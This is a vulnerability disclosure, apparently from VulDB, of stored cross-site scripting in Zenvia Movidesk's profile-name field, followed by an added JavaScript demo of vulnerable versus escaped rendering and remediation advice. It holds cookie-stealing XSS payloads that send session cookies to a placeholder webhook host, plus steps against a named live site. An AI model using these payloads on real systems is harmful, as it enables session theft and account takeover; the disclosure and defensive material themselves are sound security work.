| Title | zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting |
|---|
| Description | Vulnerability Summary
A stored XSS vulnerability was identified in Zenvia's Movidesk system. The flaw is in the username (profile name) field, which accepts HTML markup and stores it without sanitization or output encoding.
When an attacker changes their profile name to an XSS payload, the payload is stored and later rendered into the ticket view, so it executes automatically in the browser of every other user who opens the ticket page. Because the victim only has to view a ticket, this enables a zero-click Account Takeover (ATO) attack.
Vulnerability Details
Vulnerable endpoint (profile editing): https://service.sigmatelecom.com.br/Account/EditProfile
Endpoint where the XSS is triggered (ticket view): https://service.sigmatelecom.com.br/Ticket
Payload used:
<img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>
Note on the payload: an HTML attribute value is not a JavaScript expression. The quoted src value ends at the second double quote, so the browser requests https://your-webhook.com/?cookie= with an empty cookie parameter, and the trailing + `${document.cookie}` is parsed as stray attribute names. The request arriving at the webhook still proves that the stored name is rendered as live HTML on the ticket page; reading document.cookie requires an event handler or script context in the payload, which this particular string does not provide.
Impact
Automatic execution of attacker-controlled markup and script whenever a ticket is viewed;
Theft of session cookies, enabling Account Takeover without user interaction (0-click);
Compromise of any account with access to ticket data;
Privilege escalation if an administrator views the affected ticket and their session is captured.
Recommendations
To mitigate this vulnerability, it is recommended to:
Input validation: Restrict the "Username" field to the characters a display name needs and reject markup at save time.
Output escaping: HTML-encode the username, and every other user-controlled value, wherever it is rendered, using the encoding for the context it lands in (element text, attribute value, JavaScript string). This is the change that closes the bug; input filtering on its own is bypassable.
HttpOnly cookies: Set the HttpOnly flag on session cookies so that document.cookie cannot read them. This blocks the cookie-theft PoC but not the XSS itself: injected script can still issue requests to the application from the victim's session, with the victim's cookies attached.
Content Security Policy (CSP): Deploy a restrictive CSP (no inline script, script sources limited to the application's own origin) as defence in depth.
Security audits: Conduct regular security testing, in particular of other free-text fields that are rendered to other users, to identify similar vulnerabilities.
Proof of Concept (PoC)
Access the profile editing endpoint: https://service.sigmatelecom.com.br/Account/EditProfile
Change the username to the following payload:
<img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>
Save the changes.
Access the ticket page: https://service.sigmatelecom.com.br/Ticket
Observe that the payload is rendered as HTML and executed: a request from the viewing user's browser arrives at the webhook. |
|---|
| Source | ⚠️ https://service.sigmatelecom.com.br/Ticket |
|---|
| User | y4g0 (UID 80480) |
|---|
| Submitted | 2025-01-21 01:15 AM (1 year ago) |
|---|
| Moderation | 2025-02-02 08:54 AM (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 294362 [Zenvia Movidesk up to 25.01.22 Profile Editing /Account/EditProfile Username cross site scripting] |
|---|
| Points | 17 |
|---|
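The following is an added example, not code from Zenvia, Movidesk or the reporter. It models the pattern the report describes: a ticket view that concatenates the stored profile name straight into its HTML, next to the same view with context-aware output escaping, plus a blacklist "sanitizer" to show why input filtering alone does not close the bug, and a save-time validator for the username field. The ticket template, the `ticket` object, the `onerror` payload variant and the validator's character policy are assumptions made for illustration; the first payload is the one quoted in the report.

```javascript
// Added example (not Movidesk code): stored-XSS rendering vs. escaped rendering.

// Payload exactly as quoted in the report above.
const REPORTED_PAYLOAD =
  '<img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>';

// Constructed variant (assumption, not from the report): same idea but with an
// event handler, so the cookie is actually read when the image fails to load.
const EVENT_HANDLER_PAYLOAD =
  '<img src=x onerror="fetch(\'https://your-webhook.com/?cookie=\'+document.cookie)">';

// HTML escaping suitable for element text and double-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the stored name lands in the markup unencoded.
// (Hypothetical template; Movidesk's real ticket page is not reproduced here.)
function renderTicketVulnerable(ticket) {
  return `<div class="ticket"><span class="requester">${ticket.requesterName}</span>` +
    `<p>${ticket.subject}</p></div>`;
}

// Hardened rendering: every user-controlled value is escaped for its context.
function renderTicketSafe(ticket) {
  return `<div class="ticket"><span class="requester">${escapeHtml(ticket.requesterName)}</span>` +
    `<p>${escapeHtml(ticket.subject)}</p></div>`;
}

// Blacklist filter of the kind often bolted on after a report like this one:
// it removes <script> tags and nothing else.
function naiveStripScriptTags(value) {
  return String(value).replace(/<\s*\/?\s*script[^>]*>/gi, '');
}

// Save-time validation for the profile name (policy is an assumption): letters in
// any script, digits, spaces and a few punctuation marks, 1 to 80 characters.
function isAcceptableDisplayName(name) {
  return typeof name === 'string' && name.length >= 1 && name.length <= 80 &&
    /^[\p{L}\p{M}\p{N} .,'\-]+$/u.test(name);
}

// Crude check used only to make the demonstration verifiable: does the rendered
// HTML still contain a raw <img> tag or a tag carrying an on* event handler?
function containsActiveMarkup(html) {
  return /<\s*img\b/i.test(html) || /<[^>]*\bon[a-z]+\s*=/i.test(html);
}

function demo() {
  const ticket = { requesterName: REPORTED_PAYLOAD, subject: 'Cannot log in' };
  return {
    // Concatenation ships the injected tag to every viewer's browser.
    vulnerable: containsActiveMarkup(renderTicketVulnerable(ticket)),
    // Escaping turns it into inert text.
    safe: containsActiveMarkup(renderTicketSafe(ticket)),
    // Stripping <script> leaves the reported payload untouched (it has no script tag)...
    filteredReported: containsActiveMarkup(renderTicketVulnerable(
      { ...ticket, requesterName: naiveStripScriptTags(REPORTED_PAYLOAD) })),
    // ...and lets the event-handler variant through as well.
    filteredHandler: containsActiveMarkup(renderTicketVulnerable(
      { ...ticket, requesterName: naiveStripScriptTags(EVENT_HANDLER_PAYLOAD) })),
    // Validation at save time rejects both payloads but accepts an ordinary name.
    validatorRejectsPayload: !isAcceptableDisplayName(REPORTED_PAYLOAD),
    validatorAcceptsName: isAcceptableDisplayName("Ana O'Brien"),
  };
}

console.log(demo());
```

Run it with `node` and the result shows `vulnerable`, `filteredReported` and `filteredHandler` as `true` and `safe` as `false`: only the escaped render neutralises the name. If the name is also placed into an attribute (a `title`, for example), the attribute must be double-quoted and the value passed through the same `escapeHtml`; putting it into a JavaScript string or a URL needs the encoding for that context instead.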